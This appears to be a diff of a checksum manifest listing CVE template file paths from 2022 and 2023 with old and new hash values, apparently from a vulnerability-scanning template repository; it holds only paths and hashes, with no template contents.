-http/cves/2022/CVE-2022-3982.yaml:98a2a895e388d4d11c16b52cea006d6390195a81 -http/cves/2022/CVE-2022-39952.yaml:bbb1e68f851c51f09bfd8b9e1f3430c6a0cfafe8 -http/cves/2022/CVE-2022-39960.yaml:85154bd03b379feec2df461cef0deb81993089ee -http/cves/2022/CVE-2022-39986.yaml:db6d95a1027e5242ec16d60de18be2bb053a8e57 -http/cves/2022/CVE-2022-40022.yaml:03a20a810f1812404f5eeaedfabbf455a271bb89 -http/cves/2022/CVE-2022-40032.yaml:25c663beb21cbcd44e2f836ca08991864f6cfb5a -http/cves/2022/CVE-2022-40047.yaml:bef74f09f36e8702f86cf210092db4071f64c5fb -http/cves/2022/CVE-2022-40083.yaml:e7db5e7b6c0f8a3cc707e9e84a73dbc45db6557a -http/cves/2022/CVE-2022-40127.yaml:e894c80af6289263432d400d7bbdbbeeba921427 -http/cves/2022/CVE-2022-40359.yaml:1f7aff98599249a280a72359704de4c4b6386bdd -http/cves/2022/CVE-2022-4049.yaml:859b5697cd2f4c6df0672da5ec40620994698a1d -http/cves/2022/CVE-2022-4050.yaml:a942fce263115a42794c2ea57ad98751a1e983dc -http/cves/2022/CVE-2022-4057.yaml:fdc2cabbf6d26f34b0fffda36947e6c60cefe910 -http/cves/2022/CVE-2022-4059.yaml:2d1d0120b738e104a6f5eb901cb09a2b36381474 -http/cves/2022/CVE-2022-4060.yaml:9d4074b8472be8c977d9039475366b105fc32034 -http/cves/2022/CVE-2022-4063.yaml:d76408de398b29773f479a247fa3e7ddd5bdd37f +http/cves/2022/CVE-2022-36537.yaml:67567ecb0d5fcd708155505c43cda30a658c24e5 +http/cves/2022/CVE-2022-36553.yaml:4e9416caf1e91d343e28b357fc072c21b6395dbc +http/cves/2022/CVE-2022-36642.yaml:cf92a939ff546c103425309e0ed5f1dd6b08d390 +http/cves/2022/CVE-2022-36804.yaml:d8bae83b022c4dfd4bbed90231b6adde94e71c4a +http/cves/2022/CVE-2022-36883.yaml:ca00242121aba0025ab692d039039d29be562da5 +http/cves/2022/CVE-2022-37042.yaml:52a1e7123ebbce21d35541c936b37109c475c50c +http/cves/2022/CVE-2022-37153.yaml:094e406bc4bd14fa6600a99805e1d1f578d676a8 +http/cves/2022/CVE-2022-37190.yaml:6459c91625c14546618133dfc447ca9b9f97f886 +http/cves/2022/CVE-2022-37191.yaml:b08de51f3c6a1ff3efc9adabbc80bc06dd972b47 +http/cves/2022/CVE-2022-37299.yaml:bcc743ac3a8534aff4cf5c13ba5668b65689e2cb +http/cves/2022/CVE-2022-3768.yaml:2bef04c3a3495777e6c2815ad38b296fc0247def +http/cves/2022/CVE-2022-3800.yaml:66d724f7eb058bd00c41b46ef18206384a51d810 +http/cves/2022/CVE-2022-38295.yaml:855fd3acaca96d7ed3b385c98d774517b65f8b19 +http/cves/2022/CVE-2022-38296.yaml:1f28561526352737ae2bfb2d495b654d511f8f84 +http/cves/2022/CVE-2022-38463.yaml:b249323de8df9a2afbcd1841e72890405811829c +http/cves/2022/CVE-2022-38467.yaml:75e1226be3af7e55f8f4a81507e2804d904ef8ae +http/cves/2022/CVE-2022-38553.yaml:c69595447c8554fb97fa3e9b92e8061d59b6b6a9 +http/cves/2022/CVE-2022-38637.yaml:0165214e0721f97cfe32d2af7920284e36e63050 +http/cves/2022/CVE-2022-38794.yaml:aeba619e1d186cbf8dc30422cea21ae5a7b47f5c +http/cves/2022/CVE-2022-38817.yaml:acc4ef0990e7fdd7926550f697fac137d739c771 +http/cves/2022/CVE-2022-38870.yaml:bf980061e67886458acbadfc1d77a59ee9e39c0d +http/cves/2022/CVE-2022-39048.yaml:41aa51a1f94aefc1fc26d81ec8dcf7ac7aa575f5 +http/cves/2022/CVE-2022-3908.yaml:1c82b8eeff31ef53f7f7a2d718cc609cd3de2aff +http/cves/2022/CVE-2022-39195.yaml:376490467e1579751b75a4be9945da32390118b3 +http/cves/2022/CVE-2022-3933.yaml:a07749aa20b24542a226e215e0cf44f9671777ee +http/cves/2022/CVE-2022-3934.yaml:8cac4655d66abf31f59d08f0416a2a969ea4dc9b +http/cves/2022/CVE-2022-3980.yaml:f92ecd623bae505f035c7f9d982a618f6cdba4e3 +http/cves/2022/CVE-2022-3982.yaml:1e6d7cb41177297f084d5ebeb54e6838bfede3c6 +http/cves/2022/CVE-2022-39952.yaml:f69dd95bbbbadca0e0a3cba5825b32392d48e865 +http/cves/2022/CVE-2022-39960.yaml:302c12429ab15151feb5189cd66e812694e45428 +http/cves/2022/CVE-2022-39986.yaml:7fad1537c4d40e2dd95fd96020e159bde46cc072 +http/cves/2022/CVE-2022-40022.yaml:c04e0dd2dba374003c7280992a0fbb04a7a0ea9e +http/cves/2022/CVE-2022-40032.yaml:952e56f1e63cae0e66571b9227597b3baacb6aee +http/cves/2022/CVE-2022-40047.yaml:4bb7bc696bed5f6c5869dd6706399ac6c4d47b4e +http/cves/2022/CVE-2022-40083.yaml:6e55bb06e2390d87351d4fbf4bc6db97a0ebfeb6 +http/cves/2022/CVE-2022-40127.yaml:c3805f16dd4e729a02a2c9741b77c304fcb147b2 +http/cves/2022/CVE-2022-40359.yaml:f3e18999a88592ac103c16f3d14b5516a9e2dbcd +http/cves/2022/CVE-2022-4049.yaml:130a074f8e63caaf8e9fdaef18b59113be3463d8 +http/cves/2022/CVE-2022-4050.yaml:499b8608c4dd7fa62d94619039aeb756620b2317 +http/cves/2022/CVE-2022-4057.yaml:a44dcab4ce8fb89dafea11908e67e7f6cc9d40af +http/cves/2022/CVE-2022-4059.yaml:c2487bb3463b66fb4df0bb7e8dc92b0eddc0adfb +http/cves/2022/CVE-2022-4060.yaml:06a657e46dcc155859980c414c3a7f12d7f5efac +http/cves/2022/CVE-2022-4063.yaml:9488000323299cbb9cee07a10d158f2c31de2e1a http/cves/2022/CVE-2022-40684.yaml:f19b9f392b205d74b85d897dd99d96602f140a2c -http/cves/2022/CVE-2022-40734.yaml:e1a5d32907ade4b1ba0ff752f6437e78442a9386 -http/cves/2022/CVE-2022-40843.yaml:ed6c1c9a38f52281cacb2b1cf6c57d36242e9cc7 -http/cves/2022/CVE-2022-40879.yaml:4c45e69be4d1c68ea0a8815e26b20eba05db7d3f -http/cves/2022/CVE-2022-40881.yaml:fdf0bdb59e08f3cbdc59346f006537e77ff9020c -http/cves/2022/CVE-2022-4117.yaml:fdce767f38620e56f3e05d70f33d2382aee9efd3 -http/cves/2022/CVE-2022-4140.yaml:a41f372b9da6d8aabbeb6ae15d12d92827296fcb -http/cves/2022/CVE-2022-41441.yaml:2b46c4b7273656661bb821896f25d4a3d71e07a0 -http/cves/2022/CVE-2022-41473.yaml:09f7c9dac864c1840798a22f63a2c6bddb021564 -http/cves/2022/CVE-2022-41840.yaml:37283e8b77053da00df2f0e17b559825882b20ff -http/cves/2022/CVE-2022-42094.yaml:b6ddfe8bb2fff0438517ddaa0cb7be1cf51f1358 -http/cves/2022/CVE-2022-42095.yaml:c34358d3e93a4dd0b30935905382dc5b2fb10439 -http/cves/2022/CVE-2022-42096.yaml:d060f9e6a35ef331a34f36e0cb95e8f7fa8997d0 -http/cves/2022/CVE-2022-42233.yaml:65d18ec7a4b51762e24c22bdd3d0451e830f733a -http/cves/2022/CVE-2022-4260.yaml:1c1eccc67819a34a3107ad217df7a9e709f3acab -http/cves/2022/CVE-2022-42746.yaml:d497fbf33c57d94e388ea20f9063a764edd52c11 -http/cves/2022/CVE-2022-42747.yaml:6df54498fb08254a12a7589b3b6bc542aed68897 -http/cves/2022/CVE-2022-42748.yaml:c0ee58a0db49326accf2fd10b2743dd61efe9eab -http/cves/2022/CVE-2022-42749.yaml:5dc057e2ff8f33c0ea89e125ff2a5522c4a9e20e -http/cves/2022/CVE-2022-4295.yaml:97541cf8bffb6bc92b914391e5fc35a277b1777d -http/cves/2022/CVE-2022-4301.yaml:fc97088e29efa05e1b514d59c59d142a1197a39d -http/cves/2022/CVE-2022-43014.yaml:c5dfe07087f4c726da4f6636503bc1961f79c0b4 -http/cves/2022/CVE-2022-43015.yaml:975934a97966fdf47e6812a0da312f8ec7de208f -http/cves/2022/CVE-2022-43016.yaml:fa72c9ad85dceea4001667c5951e4f65c5dfbc6c -http/cves/2022/CVE-2022-43017.yaml:b030b41b588f7fd598ae8fc745069c1e20bd074e -http/cves/2022/CVE-2022-43018.yaml:5c332394dea1eae50c2eb830dded9a81506cad44 -http/cves/2022/CVE-2022-4305.yaml:c4ad47a3c0e3b56f7566501c804303fd3420d4e0 -http/cves/2022/CVE-2022-4306.yaml:0a5e948a6c0fb93b35d7547100292733cdf2b46f -http/cves/2022/CVE-2022-43140.yaml:8a0bb64d3f239cc4e0c4b528c459868cc0eb8b72 -http/cves/2022/CVE-2022-43164.yaml:dc1c1518b052963793fb2569760370637b96fe25 -http/cves/2022/CVE-2022-43165.yaml:de2860097760316554f1c13bc4886c8d68bf84f3 -http/cves/2022/CVE-2022-43166.yaml:ec848bff464a7b53f095be58bc53deea4e5129e0 -http/cves/2022/CVE-2022-43167.yaml:4889ba1fd1af98a7d78069a1887b3a51c7c6d7a5 -http/cves/2022/CVE-2022-43169.yaml:625562e7c0647380cf68e9b5ac9a2a26c060f3f2 -http/cves/2022/CVE-2022-43170.yaml:b67bc876a5596c58b0345b55237e04a3c26e9384 -http/cves/2022/CVE-2022-43185.yaml:52add81feae84c1da4948f3dd84d30d827f24779 -http/cves/2022/CVE-2022-4320.yaml:e076adf195bf68c47c8ed269ea56cf75eb14d039 -http/cves/2022/CVE-2022-4321.yaml:bebc07df0ff74132a1be30d6bf0d2faa5ec255b6 -http/cves/2022/CVE-2022-4325.yaml:06f38879d8b1e1bd104af4a67e906bd70c8fb599 -http/cves/2022/CVE-2022-4328.yaml:c9ca6b3661cb292011530386d2ef075a3d22e92b -http/cves/2022/CVE-2022-43769.yaml:64752b21ca1c677d1c3438ab877a5705f4e28f67 -http/cves/2022/CVE-2022-44290.yaml:8443dc3219d7b3a0965f6551acc79e973dbab12d -http/cves/2022/CVE-2022-44291.yaml:e193fd58dff779964b0cc496d471404bd7434f46 -http/cves/2022/CVE-2022-4447.yaml:c0f7c059deb225174ea03b529365008ce59d4a5f +http/cves/2022/CVE-2022-40734.yaml:bc460ca809f47a28a4ade60e810c8c27dd88c20f +http/cves/2022/CVE-2022-40843.yaml:dccce628b740aab660687e18c2508daf7d793dc3 +http/cves/2022/CVE-2022-40879.yaml:3f21b19f2a6e96c694ecf9e69ae728484dc698b8 +http/cves/2022/CVE-2022-40881.yaml:079fa811acbb23a36b4cf9ce214aa9ad81727eec +http/cves/2022/CVE-2022-4117.yaml:98d710f773c89beb7a55183f303abc0e53a7e72a +http/cves/2022/CVE-2022-4140.yaml:c43c41778f1b2007ca3c4812e7c8a49435192f34 +http/cves/2022/CVE-2022-41441.yaml:fb4185dc8b567f9feba382f65022294515d881f5 +http/cves/2022/CVE-2022-41473.yaml:3235bfc8a1d18530a1e15fa8768961d4adf65bc1 +http/cves/2022/CVE-2022-41840.yaml:5ad51a4abd737ecf31c8b6d3c11f02dd2c334047 +http/cves/2022/CVE-2022-42094.yaml:e88dc07647dc79316fd538d979fafb401ec2b76e +http/cves/2022/CVE-2022-42095.yaml:dd786fcf318f490e0cc59b200889611ed5e435c3 +http/cves/2022/CVE-2022-42096.yaml:3528e0649abc642746657e5a57249faa3bf3b21b +http/cves/2022/CVE-2022-42233.yaml:21ba612c075f7ea29bc6b23d692bde7378d5e374 +http/cves/2022/CVE-2022-4260.yaml:2dbe1e379f0a0d6282cce6b002e54856c6b65252 +http/cves/2022/CVE-2022-42746.yaml:b2d2710ae0f2773215c616b9b930b1df19c37590 +http/cves/2022/CVE-2022-42747.yaml:2f3101ce42ab7cd6d2c8605d64fd51d6ebd99182 +http/cves/2022/CVE-2022-42748.yaml:24a619d09eec6425ba5acbcb12f532b3976440ae +http/cves/2022/CVE-2022-42749.yaml:def750d86f8944fe4ba4ffb80d99538adc2cbead +http/cves/2022/CVE-2022-4295.yaml:b91ee964bebd0ef86da4e9252529970e81341917 +http/cves/2022/CVE-2022-4301.yaml:26256f398a527e0e0e79b6b723fd02ebb729fb9b +http/cves/2022/CVE-2022-43014.yaml:f75fe0e3d0b38b2ebef28e7860769859b40fd8a4 +http/cves/2022/CVE-2022-43015.yaml:a2725ef25a3987c72eede0e6cf3bf172070ecd85 +http/cves/2022/CVE-2022-43016.yaml:ee59ec70e4d2e3ab586ccc2577aa0b5383417622 +http/cves/2022/CVE-2022-43017.yaml:0cbb9776c82417f515e1ea74c84f43a4a232e80a +http/cves/2022/CVE-2022-43018.yaml:f3d98547001bcdd799734d18dfda570ac5bcd3f8 +http/cves/2022/CVE-2022-4305.yaml:a17bc6d2fd5889b3e9e3910524b71d29b638764f +http/cves/2022/CVE-2022-4306.yaml:dda7b8855613bc52dfc74b86b1273b5ee23e42cc +http/cves/2022/CVE-2022-43140.yaml:f8e1083cf521a67c8c4922b82f1f19e6533ed538 +http/cves/2022/CVE-2022-43164.yaml:b42feaa4ec3e4d42b735e4e251abc969cb6fad90 +http/cves/2022/CVE-2022-43165.yaml:b2916caa56f7f0fc97f5e8349e77dcaed328e815 +http/cves/2022/CVE-2022-43166.yaml:92708ba50df81c42247962d9292cd49e8a13e508 +http/cves/2022/CVE-2022-43167.yaml:cd8cee12551097b7d5e14f4214826649e061cf49 +http/cves/2022/CVE-2022-43169.yaml:7d58bec47795dd66bdb5335b215cec857718369b +http/cves/2022/CVE-2022-43170.yaml:e101e27b2e9dcc0d66e5578b8ed11421e0375f06 +http/cves/2022/CVE-2022-43185.yaml:dae56484093f7a417f8614838f3aac1db7c4de8f +http/cves/2022/CVE-2022-4320.yaml:53a5eae084adc520854497975bdd3b0424bbfda2 +http/cves/2022/CVE-2022-4321.yaml:94733d2b2aa202f1144ccde62f6ff7c000676bd3 +http/cves/2022/CVE-2022-4325.yaml:9c2ee9e83463dc80d28c46680048349f1bf6067a +http/cves/2022/CVE-2022-4328.yaml:13a42ec9837cfe56f3b366e79f5492542d88d4e7 +http/cves/2022/CVE-2022-43769.yaml:7b82c76140c8991dc849a8634ddf45a3778c192f +http/cves/2022/CVE-2022-44290.yaml:4da9e9d3ce98b131cf147fcce598be027dd3d63f +http/cves/2022/CVE-2022-44291.yaml:c29f3746899ac67d405e6da5c6735daac4bafd01 +http/cves/2022/CVE-2022-4447.yaml:cadbc7f256391562feebb99cc28d888c7ca61182 http/cves/2022/CVE-2022-44877.yaml:fb837548cd2db206ef66d643efc42fe11dbe0a72 -http/cves/2022/CVE-2022-44944.yaml:b359df31a270ee59af695d500c7b6901498998c8 -http/cves/2022/CVE-2022-44946.yaml:e4287dd4a6554abc78663849d3f3123e1c30fff4 -http/cves/2022/CVE-2022-44947.yaml:5957e393df67e40ace97e3674de606ed0a98ab3b -http/cves/2022/CVE-2022-44948.yaml:5e184cfdde7873234b533ef91d0df77e22764504 -http/cves/2022/CVE-2022-44949.yaml:894dc2e11aac995e3ae155654d0ede81219edeba -http/cves/2022/CVE-2022-44950.yaml:92ba3e30476bdb50cfb9df31afcc61fc240abcfb -http/cves/2022/CVE-2022-44951.yaml:bedd30794f67ec76973502a801043764ae66d2cb -http/cves/2022/CVE-2022-44952.yaml:2aa5f9fa9ae5f94c0bd7c4ee95e779013a42997e -http/cves/2022/CVE-2022-44957.yaml:4b329d33348605720bf14f5e6cdf1c61e1be8cb6 -http/cves/2022/CVE-2022-45037.yaml:45af11fd7be020b4ba6486ff45256f6e88937756 -http/cves/2022/CVE-2022-45038.yaml:b8d14b28aa2fabdf2e17e25df5956fdb2213a3b9 +http/cves/2022/CVE-2022-44944.yaml:07f4181db4c793b86591cdd6177014d002cd5456 +http/cves/2022/CVE-2022-44946.yaml:a6364127e9dcdeb8aeaafeebb206df5a989d9be3 +http/cves/2022/CVE-2022-44947.yaml:df3e8cb35ad1588602f91291e8c31a74322be813 +http/cves/2022/CVE-2022-44948.yaml:2088097035672af97cf08d16fd9636d52577bbbc +http/cves/2022/CVE-2022-44949.yaml:8c73a82b1fdcbe1483a3b44a7b9b8d52431767bc +http/cves/2022/CVE-2022-44950.yaml:cfb20c9a149eb3f7ac1c3f3e01927a422e619926 +http/cves/2022/CVE-2022-44951.yaml:48bdabd6d5e6c4085e107c8fc178be4c83e471c6 +http/cves/2022/CVE-2022-44952.yaml:8582a4737de9df1593abc22fe881a0c3e8e697d0 +http/cves/2022/CVE-2022-44957.yaml:a858a64e001f18bfe73324eeb0bec8b600cfad72 +http/cves/2022/CVE-2022-45037.yaml:98233f4399a882e60f28c6b54833a157a10022eb +http/cves/2022/CVE-2022-45038.yaml:b0ade2f8518bbd0aa9d6829bede11fee8921b160 http/cves/2022/CVE-2022-45354.yaml:74b3e516dafb8498fc37736a5c504dec4325bca5 http/cves/2022/CVE-2022-45362.yaml:8b38771a9d554ed3e0813063295cc0113aaf3beb http/cves/2022/CVE-2022-45365.yaml:bc6d4127eb5583316f2ee30607f2c57f6a348daa http/cves/2022/CVE-2022-45805.yaml:e48872860059c99910e7872cf33e46beffa1140a http/cves/2022/CVE-2022-45835.yaml:9b8d0fe74bf30733642921c3778b4a3e315c5872 -http/cves/2022/CVE-2022-45917.yaml:daaaa6cafab7885c7c0205fdd93ce52da50b09d4 -http/cves/2022/CVE-2022-45933.yaml:bf06e94911473c725caf9ae8e0092103ca5b791e -http/cves/2022/CVE-2022-46020.yaml:df55bad217906f4433250220e9cc2151a8bc9371 -http/cves/2022/CVE-2022-46071.yaml:7bdb5bf4b16119c8f0a14ecd44c6146f871abc2f -http/cves/2022/CVE-2022-46073.yaml:7315f12d9243961d19b4f60fdf566bedf073c83c -http/cves/2022/CVE-2022-46169.yaml:a7f9726f3b6a44874c7f574bdb13e4b8d5cb5c96 -http/cves/2022/CVE-2022-46381.yaml:aae1477b6b7fbb210d5ddc39252737ff7a0e1c3a -http/cves/2022/CVE-2022-46443.yaml:331c3ae9f743ea32b1ea2393eb8ef786b508288b -http/cves/2022/CVE-2022-46463.yaml:feb8bf0175ef8ba61aa7b0c9a1bf212d01523bb3 -http/cves/2022/CVE-2022-46888.yaml:db12677e33253b4c5760a17e785f8ff8e4e8f2db -http/cves/2022/CVE-2022-46934.yaml:51883cef8d443ff8743da72ff2c81f9629c83ed5 -http/cves/2022/CVE-2022-47002.yaml:4bc7a6957f219a4d11d092afc6573ce29b593280 -http/cves/2022/CVE-2022-47003.yaml:89c42f34dbab0e6d5e5a9d2cc97635331a9cac83 -http/cves/2022/CVE-2022-47075.yaml:d779f9576afac90fd01835dcb2d12997afae63d4 -http/cves/2022/CVE-2022-47615.yaml:8dab673babe41e6f2250c8b6de8b56139da80591 -http/cves/2022/CVE-2022-47945.yaml:1afea82335fbc0aa1bc5e32c2680fd127425c9b7 -http/cves/2022/CVE-2022-47966.yaml:33f313cf309f54f97a219a8dc0a072ee77dec169 -http/cves/2022/CVE-2022-47986.yaml:4acfb48fb342c670424260644657753f683b0795 -http/cves/2022/CVE-2022-48012.yaml:9958929b285bb6018ca3851536d4d0c1f438cf11 -http/cves/2022/CVE-2022-48165.yaml:4717c7004c61e0bfb1d36e939a35fc46a5060ac6 -http/cves/2022/CVE-2022-48197.yaml:cd74e54cd99791ad5cf12c8bbe3609fe975039fe -http/cves/2022/CVE-2022-4897.yaml:5f56119c7ede003c41f8c00de509e6ff7d5d0842 -http/cves/2023/CVE-2023-0099.yaml:d9954a1ee1950d1df81fd813507b1ddba839547c -http/cves/2023/CVE-2023-0126.yaml:634f3349817a769e16e50bbfe6fd406ca746ad29 -http/cves/2023/CVE-2023-0236.yaml:f108666e95a24e51479518b7720ac9771e06130d -http/cves/2023/CVE-2023-0261.yaml:8fb2cff2bbf23f9744b7afa542310561766bb4d9 +http/cves/2022/CVE-2022-45917.yaml:b51fc3328f2c84619ff86d49c5384a63850ff13a +http/cves/2022/CVE-2022-45933.yaml:9b6ee3fb0705d8229d525dfdb1ebb33d1880fe2b +http/cves/2022/CVE-2022-46020.yaml:7c4d4961d724f307e7c568ed19a43c10caeae055 +http/cves/2022/CVE-2022-46071.yaml:0b0b93d0992ebc1de9319ece0f144f0385ed8adc +http/cves/2022/CVE-2022-46073.yaml:0eec3bd76660fd5ede35062bc51ac134939fc33c +http/cves/2022/CVE-2022-46169.yaml:9dfe55cd4abdf4b91bc38d47daa85dd801bb8315 +http/cves/2022/CVE-2022-46381.yaml:87c3a319cceee6f4e097c363bc5e64fe814d92db +http/cves/2022/CVE-2022-46443.yaml:111e978310a26a245542949a321e2f3066666ccc +http/cves/2022/CVE-2022-46463.yaml:94d2eef1c4cb94c6a5d0eea0b55bba0a3e8dea1b +http/cves/2022/CVE-2022-46888.yaml:240e335612355647437ea73246668f6efb47e185 +http/cves/2022/CVE-2022-46934.yaml:58681da247f0a18cc11a133e17d30b5e32571335 +http/cves/2022/CVE-2022-47002.yaml:e01f11efaf8a0ee2b5afdabf9a7e2385b26f3510 +http/cves/2022/CVE-2022-47003.yaml:38b2d65f68afab6823ebe1e55f5ae77231576a62 +http/cves/2022/CVE-2022-47075.yaml:c733948d8abdd17bc543b33d181007199ba42527 +http/cves/2022/CVE-2022-47615.yaml:7412f2f3c0b0978820d995eae21bda20f18a5963 +http/cves/2022/CVE-2022-47945.yaml:cb69c9e3fa22b790e98da8f36e0f922d87d733cf +http/cves/2022/CVE-2022-47966.yaml:b98313a7e12358d30d0f473b94def0ac7abadf47 +http/cves/2022/CVE-2022-47986.yaml:80b523d218d2fc59f98ae1c4b2528bf0bd13330f +http/cves/2022/CVE-2022-48012.yaml:13ac37ee71cde65cef6a17efbd992f2a4da6d017 +http/cves/2022/CVE-2022-48165.yaml:2cd235789e7ce0e820d5a69eb19617cb2140d724 +http/cves/2022/CVE-2022-48197.yaml:31997106f1f251dc2e640a2a8477b264dac18f7b +http/cves/2022/CVE-2022-4897.yaml:016a387f9e78dfc8191a9550fff0266251408483 +http/cves/2023/CVE-2023-0099.yaml:91b0a7ca6f80ea7e1cf5dbbe4282e0eb6ea3f9d4 +http/cves/2023/CVE-2023-0126.yaml:0ca13b49ac4181ae7ed201a2a2b9207728c73c57 +http/cves/2023/CVE-2023-0236.yaml:58c16abbff31da07f1d55c4518bfbf9f2cd5ec21 +http/cves/2023/CVE-2023-0261.yaml:a5fdb511390ef54891761ae715e44cee7b945128 http/cves/2023/CVE-2023-0297.yaml:49d20c394effbc10b20f06ecb8090927e9f919d7 -http/cves/2023/CVE-2023-0334.yaml:33b6fec071e11972801913d6e8e8141d2bd69fb3 -http/cves/2023/CVE-2023-0448.yaml:a166f08215338dfea8da743eaf9f9e5e3741f06e -http/cves/2023/CVE-2023-0514.yaml:6ed0da89f94f7b3a9c349c81060cd04adfa2c8e3 -http/cves/2023/CVE-2023-0527.yaml:35d2498e7dd560e241d01a24fb53be656bc33dcf -http/cves/2023/CVE-2023-0552.yaml:6582e9369cf64e2802523f964fd56c55d068011e -http/cves/2023/CVE-2023-0562.yaml:383cd1beb17c9e8734c8f28fce18cec088d5b651 -http/cves/2023/CVE-2023-0563.yaml:6629e9bd6ae2e63e8584dbf60cf4ee0021efdb17 -http/cves/2023/CVE-2023-0600.yaml:1c3045ef76fbdebd92f149a20a6a7da579117ced -http/cves/2023/CVE-2023-0602.yaml:2ddda6bb3957ae5f5a3568b15af1b16646c1cd67 -http/cves/2023/CVE-2023-0630.yaml:d4df68752b7dd5ad05eb930c3882a4c7168f867d -http/cves/2023/CVE-2023-0669.yaml:157068392a8376ee7dc747757b3134781709e30e -http/cves/2023/CVE-2023-0777.yaml:37fed01bfe2bcdc2bdc1bce1d70a05cb6de144f9 -http/cves/2023/CVE-2023-0900.yaml:95a8cc311de63f97fa1b1622bb06cf23e8ce4bde -http/cves/2023/CVE-2023-0942.yaml:60ebdcacbc0e1a5e52b15d1b030a44dd5cf023ea -http/cves/2023/CVE-2023-0947.yaml:ca0e8fb55dff7dc49ad943d74eb109c59a881fe4 -http/cves/2023/CVE-2023-0948.yaml:eea386dbaa6cc21f300fa4f2ddb5bd29c75e6d4c -http/cves/2023/CVE-2023-0968.yaml:ab1b9c9c590cdd304a7a58c23df1a6013777b7c3 -http/cves/2023/CVE-2023-1020.yaml:e13022b3aedc94e52b79826edffed9c7e7ac233a -http/cves/2023/CVE-2023-1080.yaml:b90dee1f8caa9e6c64d314bf7929d362b7bf6bab -http/cves/2023/CVE-2023-1177.yaml:06136377840beec280f60405caaea91d2fd54ea7 -http/cves/2023/CVE-2023-1263.yaml:b368d4ffe916c8fd1e0d7e65d95482471131ee22 -http/cves/2023/CVE-2023-1362.yaml:849997452fdd1133310dde2584d4ca7c90882ffd -http/cves/2023/CVE-2023-1408.yaml:72efc0c5fa40ba03ca98fba221f7f32135d8ce48 +http/cves/2023/CVE-2023-0334.yaml:d79e89f26fce21fb42cf99429b939b9ef68a3343 +http/cves/2023/CVE-2023-0448.yaml:e586dbf6dc3266308c5ed2e70574081ba7c76d48 +http/cves/2023/CVE-2023-0514.yaml:a8f81f8dd2f9c016cc45fe45c074d291bd27aff6 +http/cves/2023/CVE-2023-0527.yaml:2d08cee6e7c7621a7d0c02f90c88c6a1b369996d +http/cves/2023/CVE-2023-0552.yaml:43f393ad5f7e14d9c05785d32fd2a14b8e3262a7 +http/cves/2023/CVE-2023-0562.yaml:29623587dbca0d8004d3a350fe603d1f64f7f057 +http/cves/2023/CVE-2023-0563.yaml:2425c385ea4baab846dd76d8e7b2831d0779ba0e +http/cves/2023/CVE-2023-0600.yaml:bc056f50b7bb8d9181d8d05d2d0182348ace4c8a +http/cves/2023/CVE-2023-0602.yaml:5cbc208a4f5bc3ae16edb3e773437750ce9cf838 +http/cves/2023/CVE-2023-0630.yaml:839eaf7c113e4bbb0d400b6ba4a16838cc40e69d +http/cves/2023/CVE-2023-0669.yaml:e5a3638fbec483e52cc59da62c4f4e411b5963a4 +http/cves/2023/CVE-2023-0777.yaml:a0b943327ce996cc616f605f2be45f6993260d71 +http/cves/2023/CVE-2023-0900.yaml:900a59cfbce5bda78be6d3f918d66f490717e747 +http/cves/2023/CVE-2023-0942.yaml:e3ad3749dbf8eb2836532a3c58b5c0e5da299995 +http/cves/2023/CVE-2023-0947.yaml:b5b5c025c11cd6cabae57b7a327d52aea7dbba39 +http/cves/2023/CVE-2023-0948.yaml:6fd23c3a6e4bda3740501408dfb41b24ab1ffb43 +http/cves/2023/CVE-2023-0968.yaml:71343e010978de97f569b79be06ffd6c9a885630 +http/cves/2023/CVE-2023-1020.yaml:9ee8c76b09e5ec84e4ed0eef45d7095046918456 +http/cves/2023/CVE-2023-1080.yaml:f6bffb9fe1834a2a2efc7a3c39f9d40c0cb1c4a7 +http/cves/2023/CVE-2023-1177.yaml:d506e6558cee4dcf36951fb908ef3fd01a2acc3a +http/cves/2023/CVE-2023-1263.yaml:859b755151d49f867492154d2f9afea5d8ad98a5 +http/cves/2023/CVE-2023-1362.yaml:4089b01d7db10e646dcf6a996bcb277f3f7e8f55 +http/cves/2023/CVE-2023-1408.yaml:4ac6c85b157647cd12156597acb5c269deb6bc66 http/cves/2023/CVE-2023-1434.yaml:8d9ea6102d27ff45261b9622412d4a1ab23b96b1 -http/cves/2023/CVE-2023-1454.yaml:c3a273aa6b6aece6cfeb05c1fa007f0588a764ea -http/cves/2023/CVE-2023-1496.yaml:0f041003ca99f2f20d0d11127cd2988d10ae179e -http/cves/2023/CVE-2023-1546.yaml:430ab3146e760261f651743a46e7b8f9345a6ff5 -http/cves/2023/CVE-2023-1671.yaml:c37880f222963c7bd184ae6961ca8489a142dbc9 -http/cves/2023/CVE-2023-1698.yaml:8342553bcffc10068f94fd29ac945e7a2b303978 -http/cves/2023/CVE-2023-1730.yaml:106a914b75270762a695256615a251493c9bf1f0 -http/cves/2023/CVE-2023-1780.yaml:bb1e6d8af457c427ed144d5f3effe5c03f1ee202 -http/cves/2023/CVE-2023-1835.yaml:45430053130bd613ee230f33507bf4224dd86a10 -http/cves/2023/CVE-2023-1880.yaml:068e200ca0d2854b64a9489135a7c2eb675c282a -http/cves/2023/CVE-2023-1890.yaml:7cc35f8e584a31b32bff9a3184e90aedf14a4cd1 -http/cves/2023/CVE-2023-20073.yaml:84e60cf0079650c6dbfeedce458306b4ebc467be -http/cves/2023/CVE-2023-2009.yaml:7feefc3b75e2fb0d52c23144d63cc34a44af0aed -http/cves/2023/CVE-2023-20198.yaml:3607327142754da1aa5f238ffa5f120ac3175a10 -http/cves/2023/CVE-2023-2023.yaml:5d231db2a1a1550bf0c7e6cfc8adfcdf559bebbc -http/cves/2023/CVE-2023-20864.yaml:4f1b7dd30db2ca447110698cfb3be2d0f18279f3 -http/cves/2023/CVE-2023-20887.yaml:2f0f1bbb72a3309b80241c8ebc71e522c61f674c -http/cves/2023/CVE-2023-20888.yaml:8314752967e0b1172b56ceec760f875282f52406 -http/cves/2023/CVE-2023-20889.yaml:b4dd56792449a15bdde00eb06283ee19c7c00ac9 -http/cves/2023/CVE-2023-2122.yaml:0f194a4ba20416dfff82c6ff6e3b5a62f0d03968 -http/cves/2023/CVE-2023-2130.yaml:52edc919db53393743f4b5637737660684f7762b -http/cves/2023/CVE-2023-2178.yaml:52c414de6f901bc6bea6349f316a4183f6bf73f5 -http/cves/2023/CVE-2023-2224.yaml:fa5dc0d2d7e018da40e06589b0fdc9131890b498 -http/cves/2023/CVE-2023-22432.yaml:e36ea6bbaf92b66056ac1e99a0030d3cf0884515 -http/cves/2023/CVE-2023-22463.yaml:d2440a47082ab058aabcb2ca3655fce7305bc37e -http/cves/2023/CVE-2023-22478.yaml:c62d76dd2ea11531093a0569fb16255f67211392 -http/cves/2023/CVE-2023-22480.yaml:c89ac259667de547b9d4dde653a4f0ea5b47c7d6 